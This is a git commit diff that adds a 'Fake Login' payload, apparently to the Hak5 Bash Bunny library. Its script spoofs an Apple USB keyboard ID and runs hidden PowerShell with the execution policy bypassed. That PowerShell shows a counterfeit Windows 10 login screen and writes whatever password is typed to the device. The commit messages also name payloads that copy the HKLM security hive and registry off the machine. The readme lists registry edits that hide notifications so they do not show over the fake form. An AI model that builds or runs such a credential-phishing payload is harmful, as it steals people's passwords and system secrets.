Update PoSH_Morsecode, Add Windows 10 Login Screen (#430)

* Add files via upload

* Update readme.md

* Update payload.txt

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Add files via upload

* Update readme.md

* Update readme.md

* Add Payload WIN_PoSH_HKU_RegBackUp

* Update readme.md

* Update payload.txt

* Change for admin shell

* Update readme.md

* Update payload.txt

* Update payload.txt

* Update readme.md

* Added payload WIN_PoSH_SaveSecurityHive

Added new payload to exfiltration that saves the HKLM security hive to the bunny

* Morse Code File Exfiltration

A bit pointless with limitation of morse code but I thought it was fun to create.

* Update readme.md

* Update for non-alphanumeric

* Update for timing

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Update payload.txt

* New payload - Fake Login

Shows a fake version of the windows 10 login screen

* Update readme.md

* Changes to Fake Login Payload

* Changes to Fake Login

payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt

@@ -0,0 +1,20 @@
+# Title:        Fake Login
+# Description:  Shows a fake login screen
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Credentials
+# Target:       Windows (Powershell 5.1+)
+# Attackmodes:	HID & STORAGE 
+# Extensions:   Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
+
+LED ATTACK
+
+RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
+
+LED FINNISH

payloads/library/credentials/Win_PoSH_FakeLogin/readme.md

@@ -0,0 +1,45 @@
+# Fake Login
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Credentials
+- Attackmode: HID & Storage
+- Extensions: Run
+- Props: PanicAcid for testing multi-screen desktops, Foxtrot and Other Hak5 Discord members
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Shows a fake login screen. Saves the entered value to the loots folder on the bunny.
+
+## Config
+This payload contains 9 base64 encode images.
+If you do not wish to use them you could have the files on the bunny and do something like this:
+```powershell
+$BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
+```
+or if you have web hosting or a http server runing on the bunny then you can do something like:
+```powershell
+$R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg'; 
+$BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);
+```
+
+## To Do
+Adding a To Do section just in case someone (or me if I can be bothered) want to fix some issues:
+
+- Fade between Time panel 1 and login panel 2
+    - The beginnings of the code are there but has too much noticeable flicker.
+- Disable notifications as they display over the form:
+    - HKEY\_LOCAL\_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Explorer, this Explorer needs to be created, Dword32 “DisableNotificationCenter”, value as 1.
+    - HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications, "ToastEnabled" DWORD 0 = Turn off
+    - HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.AutoPlay, "Enabled" = 0
+
+## Colours
+| Status | Colour                        | Description                 |
+| ------ | ----------------------------- | --------------------------- |
+| SETUP  | Magenta solid                 | Setting attack mode         |
+| ATTACK | Yellow single blink           | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished          |